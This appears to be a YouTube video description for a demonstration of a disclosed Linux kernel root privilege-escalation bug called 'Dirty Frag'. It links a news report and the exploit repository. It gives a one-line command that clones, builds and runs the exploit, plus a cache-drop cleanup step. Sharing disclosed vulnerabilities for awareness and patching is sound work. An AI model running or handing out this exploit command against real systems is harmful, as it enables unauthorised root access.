In this video I'll be running the PoC for dirty frag on my Devuan peppermint xfce4 edition. It was disclosed by Hyunwoo Kim (Not to be Confused with Melee God from Ranker's Return Remake)
It affects all distro and kernel versions from 9 years ago. After running the script make sure to run drop cache as a root user to cleanup standby/cache to flush dirty cache memory. There's also a potential workaround to remove the module if affected otherwise you can skip it.
Links:
Bleeping Computer: https://www.bleepingcomputer.com/news/security/new-linux-dirty-frag-zero-day-with-poc-exploit-gives-root-privileges/
Dirty Frag: https://github.com/V4bel/dirtyfrag
deepAI: https://deepai.org
Commands:
One liner: git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Drop Entire Page Cache (Needs Root User): echo 3 (replace with Greater Than Symbol, can't type due to YouTube restriction) /proc/sys/vm/drop_caches
